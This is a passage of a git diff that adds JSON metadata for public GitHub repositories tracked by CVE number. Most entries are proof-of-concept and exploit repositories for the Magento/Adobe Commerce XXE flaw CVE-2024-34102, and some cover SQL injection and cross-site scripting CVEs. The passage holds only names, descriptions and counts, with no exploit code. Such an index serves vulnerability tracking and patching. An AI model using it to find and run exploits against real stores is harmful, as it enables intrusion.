"login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-34102", + "description": "POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento \/ Adobe Commerce. ", + "fork": false, + "created_at": "2024-06-27T21:57:24Z", + "updated_at": "2024-12-11T07:03:26Z", + "pushed_at": "2024-06-29T08:13:05Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 821393232, + "name": "CVE-2024-34102", + "full_name": "11whoami99\/CVE-2024-34102", + "owner": { + "login": "11whoami99", + "id": 122907550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122907550?v=4", + "html_url": "https:\/\/github.com\/11whoami99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/11whoami99\/CVE-2024-34102", + "description": "POC for CVE-2024-34102 : Unauthenticated Magento XXE and bypassing WAF , You will get http connection on ur webhook", + "fork": false, + "created_at": "2024-06-28T12:45:40Z", + "updated_at": "2024-07-02T12:02:29Z", + "pushed_at": "2024-07-01T03:20:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821443628, + "name": "CVE-2024-34102", + "full_name": "d0rb\/CVE-2024-34102", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-34102", + "description": "A PoC demonstration , critical XML entity injection vulnerability in Magento", + "fork": false, + "created_at": "2024-06-28T14:50:29Z", + "updated_at": "2024-06-28T14:52:44Z", + "pushed_at": "2024-06-28T14:52:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821600228, + "name": "CVE-2024-34102", + "full_name": "Chocapikk\/CVE-2024-34102", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-34102", + "description": "CosmicSting (CVE-2024-34102)", + "fork": false, + "created_at": "2024-06-28T23:33:21Z", + "updated_at": "2024-12-11T06:12:17Z", + "pushed_at": "2024-09-05T18:38:46Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 39, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822233085, + "name": "CVE-2024-34102", + "full_name": "0x0d3ad\/CVE-2024-34102", + "owner": { + "login": "0x0d3ad", + "id": 18898977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4", + "html_url": "https:\/\/github.com\/0x0d3ad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2024-34102", + "description": "CVE-2024-34102 (Magento XXE)", + "fork": false, + "created_at": "2024-06-30T16:49:26Z", + "updated_at": "2024-11-30T19:29:05Z", + "pushed_at": "2024-07-01T17:42:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822404350, + "name": "CVE-2024-34102", + "full_name": "cmsec423\/CVE-2024-34102", + "owner": { + "login": "cmsec423", + "id": 174170165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174170165?v=4", + "html_url": "https:\/\/github.com\/cmsec423", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cmsec423\/CVE-2024-34102", + "description": "Magento XXE", + "fork": false, + "created_at": "2024-07-01T05:06:42Z", + "updated_at": "2024-07-01T05:06:42Z", + "pushed_at": "2024-07-01T05:06:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822404987, + "name": "Magento-XXE-CVE-2024-34102", + "full_name": "cmsec423\/Magento-XXE-CVE-2024-34102", + "owner": { + "login": "cmsec423", + "id": 174170165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174170165?v=4", + "html_url": "https:\/\/github.com\/cmsec423", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cmsec423\/Magento-XXE-CVE-2024-34102", + "description": null, + "fork": false, + "created_at": "2024-07-01T05:08:37Z", + "updated_at": "2024-07-01T05:08:37Z", + "pushed_at": "2024-07-01T05:08:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822475682, + "name": "CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento", + "full_name": "jakabakos\/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento", + "description": "CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)", + "fork": false, + "created_at": "2024-07-01T08:19:28Z", + "updated_at": "2024-12-17T13:58:45Z", + "pushed_at": "2024-07-05T09:26:02Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825491938, + "name": "cosmicsting-validator", + "full_name": "SamJUK\/cosmicsting-validator", + "owner": { + "login": "SamJUK", + "id": 7872420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7872420?v=4", + "html_url": "https:\/\/github.com\/SamJUK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SamJUK\/cosmicsting-validator", + "description": "CosmicSting (CVE-2024-34102) POC \/ Patch Validator", + "fork": false, + "created_at": "2024-07-07T23:35:18Z", + "updated_at": "2024-07-13T16:59:26Z", + "pushed_at": "2024-07-13T16:59:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cosmicsting", + "cve-2024-34102", + "devsecops", + "magento", + "magento-security-patches", + "poc", + "proof-of-concept", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825723072, + "name": "poc", + "full_name": "unknownzerobit\/poc", + "owner": { + "login": "unknownzerobit", + "id": 62531811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62531811?v=4", + "html_url": "https:\/\/github.com\/unknownzerobit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unknownzerobit\/poc", + "description": "poc for CVE-2024-34102 ", + "fork": false, + "created_at": "2024-07-08T11:23:12Z", + "updated_at": "2024-07-08T11:41:56Z", + "pushed_at": "2024-07-08T11:41:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827307888, + "name": "CVE-2024-34102", + "full_name": "crynomore\/CVE-2024-34102", + "owner": { + "login": "crynomore", + "id": 27213554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27213554?v=4", + "html_url": "https:\/\/github.com\/crynomore", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crynomore\/CVE-2024-34102", + "description": "Burp Extension to test for CVE-2024-34102", + "fork": false, + "created_at": "2024-07-11T11:54:08Z", + "updated_at": "2024-07-11T11:54:43Z", + "pushed_at": "2024-07-11T11:54:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828170201, + "name": "CVE-2024-34102", + "full_name": "bughuntar\/CVE-2024-34102", + "owner": { + "login": "bughuntar", + "id": 99727538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99727538?v=4", + "html_url": "https:\/\/github.com\/bughuntar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bughuntar\/CVE-2024-34102", + "description": "Exploitation CVE-2024-34102", + "fork": false, + "created_at": "2024-07-13T10:25:23Z", + "updated_at": "2024-08-26T01:45:05Z", + "pushed_at": "2024-07-15T04:16:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-34102", + "exploitation" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828292663, + "name": "CVE-2024-34102-Python", + "full_name": "bughuntar\/CVE-2024-34102-Python", + "owner": { + "login": "bughuntar", + "id": 99727538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99727538?v=4", + "html_url": "https:\/\/github.com\/bughuntar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bughuntar\/CVE-2024-34102-Python", + "description": "CVE-2024-34102 Exploiter based on Python", + "fork": false, + "created_at": "2024-07-13T17:31:10Z", + "updated_at": "2024-07-15T04:16:38Z", + "pushed_at": "2024-07-15T04:16:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-34102" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828468155, + "name": "CVE-2024-34102", + "full_name": "Phantom-IN\/CVE-2024-34102", + "owner": { + "login": "Phantom-IN", + "id": 65243646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65243646?v=4", + "html_url": "https:\/\/github.com\/Phantom-IN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Phantom-IN\/CVE-2024-34102", + "description": null, + "fork": false, + "created_at": "2024-07-14T08:40:59Z", + "updated_at": "2024-10-08T05:22:23Z", + "pushed_at": "2024-07-14T08:42:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 839724541, + "name": "magento2-cosmic-sting-patch", + "full_name": "wubinworks\/magento2-cosmic-sting-patch", + "owner": { + "login": "wubinworks", + "id": 127310257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127310257?v=4", + "html_url": "https:\/\/github.com\/wubinworks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wubinworks\/magento2-cosmic-sting-patch", + "description": "Magento 2 patch for CVE-2024-34102(aka CosmicSting). Another way(as an extension) to hotfix the security hole if you cannot apply the official patch or cannot upgrade Magento.", + "fork": false, + "created_at": "2024-08-08T07:47:24Z", + "updated_at": "2024-10-25T10:44:59Z", + "pushed_at": "2024-08-08T08:31:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bug", + "cosmicsting", + "cve-2024-34102", + "extension", + "hotfix", + "magento2", + "patch", + "security-hole" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841861554, + "name": "CVE-2024-34102", + "full_name": "EQSTLab\/CVE-2024-34102", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-34102", + "description": "PoC for CVE-2024-34102", + "fork": false, + "created_at": "2024-08-13T07:33:20Z", + "updated_at": "2024-10-04T10:38:23Z", + "pushed_at": "2024-08-13T08:48:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844692267, + "name": "CVE-2024-34102", + "full_name": "dream434\/CVE-2024-34102", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2024-34102", + "description": "adobe commerce", + "fork": false, + "created_at": "2024-08-19T19:25:48Z", + "updated_at": "2024-10-09T13:47:19Z", + "pushed_at": "2024-10-09T13:47:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869658204, + "name": "magento-cve-2024-34102-exploit-cosmicstring", + "full_name": "bka\/magento-cve-2024-34102-exploit-cosmicstring", + "owner": { + "login": "bka", + "id": 584644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/584644?v=4", + "html_url": "https:\/\/github.com\/bka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bka\/magento-cve-2024-34102-exploit-cosmicstring", + "description": null, + "fork": false, + "created_at": "2024-10-08T17:02:11Z", + "updated_at": "2024-10-09T12:33:40Z", + "pushed_at": "2024-10-09T12:33:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 898539017, + "name": "magento2-encryption-key-manager-cli", + "full_name": "wubinworks\/magento2-encryption-key-manager-cli", + "owner": { + "login": "wubinworks", + "id": 127310257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127310257?v=4", + "html_url": "https:\/\/github.com\/wubinworks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wubinworks\/magento2-encryption-key-manager-cli", + "description": "A utility for Magento 2 encryption key rotation and management. CVE-2024-34102(aka Cosmic Sting) victims can use it as an aftercare.", + "fork": false, + "created_at": "2024-12-04T15:19:19Z", + "updated_at": "2024-12-04T15:52:29Z", + "pushed_at": "2024-12-04T15:47:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cli", + "cosmic-sting", + "cve-2024-34102", + "deployment-automation", + "encryption-key", + "key-generation", + "key-rotation", + "magento2" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 913421139, + "name": "CVE-2024-34102", + "full_name": "mksundaram69\/CVE-2024-34102", + "owner": { + "login": "mksundaram69", + "id": 55274010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55274010?v=4", + "html_url": "https:\/\/github.com\/mksundaram69", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mksundaram69\/CVE-2024-34102", + "description": null, + "fork": false, + "created_at": "2025-01-07T16:46:02Z", + "updated_at": "2025-01-07T16:47:53Z", + "pushed_at": "2025-01-07T16:47:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34144.json b/2024/CVE-2024-34144.json new file mode 100644 index 0000000000..3b86caa7cd --- /dev/null +++ b/2024/CVE-2024-34144.json @@ -0,0 +1,33 @@ +[ + { + "id": 835035053, + "name": "CVE-2024-34144", + "full_name": "MXWXZ\/CVE-2024-34144", + "owner": { + "login": "MXWXZ", + "id": 16700613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16700613?v=4", + "html_url": "https:\/\/github.com\/MXWXZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MXWXZ\/CVE-2024-34144", + "description": "PoC for CVE-2024-34144", + "fork": false, + "created_at": "2024-07-29T03:02:39Z", + "updated_at": "2024-09-23T08:58:10Z", + "pushed_at": "2024-07-29T11:23:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34220.json b/2024/CVE-2024-34220.json new file mode 100644 index 0000000000..3d04598e8b --- /dev/null +++ b/2024/CVE-2024-34220.json @@ -0,0 +1,33 @@ +[ + { + "id": 792704109, + "name": "CVE-2024-34220", + "full_name": "dovankha\/CVE-2024-34220", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34220", + "description": "CVE-2024-34220 | SQL injection", + "fork": false, + "created_at": "2024-04-27T10:32:10Z", + "updated_at": "2024-05-16T14:49:52Z", + "pushed_at": "2024-05-16T14:49:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34221.json b/2024/CVE-2024-34221.json new file mode 100644 index 0000000000..70cb9e959f --- /dev/null +++ b/2024/CVE-2024-34221.json @@ -0,0 +1,33 @@ +[ + { + "id": 798218314, + "name": "CVE-2024-34221", + "full_name": "dovankha\/CVE-2024-34221", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34221", + "description": "CVE-2024-34221 | Insecure pemission", + "fork": false, + "created_at": "2024-05-09T10:32:30Z", + "updated_at": "2024-05-11T10:46:45Z", + "pushed_at": "2024-05-11T08:19:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34222.json b/2024/CVE-2024-34222.json new file mode 100644 index 0000000000..9791836fa3 --- /dev/null +++ b/2024/CVE-2024-34222.json @@ -0,0 +1,33 @@ +[ + { + "id": 799116642, + "name": "CVE-2024-34222", + "full_name": "dovankha\/CVE-2024-34222", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34222", + "description": "CVE-2024-34222 | SQL injection", + "fork": false, + "created_at": "2024-05-11T08:20:55Z", + "updated_at": "2024-05-11T10:46:24Z", + "pushed_at": "2024-05-11T08:34:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34223.json b/2024/CVE-2024-34223.json new file mode 100644 index 0000000000..9ebfc8a926 --- /dev/null +++ b/2024/CVE-2024-34223.json @@ -0,0 +1,33 @@ +[ + { + "id": 799120747, + "name": "CVE-2024-34223", + "full_name": "dovankha\/CVE-2024-34223", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34223", + "description": "CVE-2024-34223 | Insecure permission", + "fork": false, + "created_at": "2024-05-11T08:36:16Z", + "updated_at": "2024-05-11T10:47:53Z", + "pushed_at": "2024-05-11T08:57:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34224.json b/2024/CVE-2024-34224.json new file mode 100644 index 0000000000..d2c181c850 --- /dev/null +++ b/2024/CVE-2024-34224.json @@ -0,0 +1,33 @@ +[ + { + "id": 799128235, + "name": "CVE-2024-34224", + "full_name": "dovankha\/CVE-2024-34224", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34224", + "description": "CVE-2024-34224 | Cross Site Scripting", + "fork": false, + "created_at": "2024-05-11T08:58:31Z", + "updated_at": "2024-05-11T10:54:34Z", + "pushed_at": "2024-05-11T10:22:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34225.json b/2024/CVE-2024-34225.json new file mode 100644 index 0000000000..c0a093054a --- /dev/null +++ b/2024/CVE-2024-34225.json @@ -0,0 +1,33 @@ +[ + { + "id": 799155465, + "name": "CVE-2024-34225", + "full_name": "dovankha\/CVE-2024-34225", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34225", + "description": "CVE-20240-34225 | Cross Site Scripting", + "fork": false, + "created_at": "2024-05-11T10:20:52Z", + "updated_at": "2024-05-11T10:54:14Z", + "pushed_at": "2024-05-11T10:25:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34226.json b/2024/CVE-2024-34226.json new file mode 100644 index 0000000000..a3e65c2c18 --- /dev/null +++ b/2024/CVE-2024-34226.json @@ -0,0 +1,33 @@ +[ + { + "id": 799159247, + "name": "CVE-2024-34226", + "full_name": "dovankha\/CVE-2024-34226", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34226", + "description": "CVE-2024-34226 | SQL injection", + "fork": false, + "created_at": "2024-05-11T10:33:04Z", + "updated_at": "2024-05-11T10:53:59Z", + "pushed_at": "2024-05-11T10:42:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34310.json b/2024/CVE-2024-34310.json new file mode 100644 index 0000000000..45ee999d36 --- /dev/null +++ b/2024/CVE-2024-34310.json @@ -0,0 +1,33 @@ +[ + { + "id": 798792445, + "name": "CVE-2024-34310", + "full_name": "3309899621\/CVE-2024-34310", + "owner": { + "login": "3309899621", + "id": 121653948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121653948?v=4", + "html_url": "https:\/\/github.com\/3309899621", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3309899621\/CVE-2024-34310", + "description": "CVE-2024-34310", + "fork": false, + "created_at": "2024-05-10T13:36:19Z", + "updated_at": "2024-05-10T13:39:31Z", + "pushed_at": "2024-05-10T13:39:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34312.json b/2024/CVE-2024-34312.json new file mode 100644 index 0000000000..d428a9794b --- /dev/null +++ b/2024/CVE-2024-34312.json @@ -0,0 +1,36 @@ +[ + { + "id": 818913831, + "name": "CVE-2024-34312", + "full_name": "vincentscode\/CVE-2024-34312", + "owner": { + "login": "vincentscode", + "id": 26576880, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26576880?v=4", + "html_url": "https:\/\/github.com\/vincentscode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincentscode\/CVE-2024-34312", + "description": "☣️ This repository contains the description and a proof of concept for CVE-2024-34312", + "fork": false, + "created_at": "2024-06-23T08:37:44Z", + "updated_at": "2024-06-23T09:28:30Z", + "pushed_at": "2024-06-23T08:59:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "security-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34313.json b/2024/CVE-2024-34313.json new file mode 100644 index 0000000000..58884a561a --- /dev/null +++ b/2024/CVE-2024-34313.json @@ -0,0 +1,36 @@ +[ + { + "id": 818920157, + "name": "CVE-2024-34313", + "full_name": "vincentscode\/CVE-2024-34313", + "owner": { + "login": "vincentscode", + "id": 26576880, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26576880?v=4", + "html_url": "https:\/\/github.com\/vincentscode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincentscode\/CVE-2024-34313", + "description": "☣️ This repository contains the description and a proof of concept for CVE-2024-34313", + "fork": false, + "created_at": "2024-06-23T09:02:07Z", + "updated_at": "2024-07-22T17:39:33Z", + "pushed_at": "2024-07-22T17:39:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "security-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34329.json b/2024/CVE-2024-34329.json new file mode 100644 index 0000000000..68f0df2360 --- /dev/null +++ b/2024/CVE-2024-34329.json @@ -0,0 +1,33 @@ +[ + { + "id": 832282458, + "name": "CVE-2024-34329", + "full_name": "pamoutaf\/CVE-2024-34329", + "owner": { + "login": "pamoutaf", + "id": 78760061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78760061?v=4", + "html_url": "https:\/\/github.com\/pamoutaf", + "user_view_type": "public" + }, + "html_url": 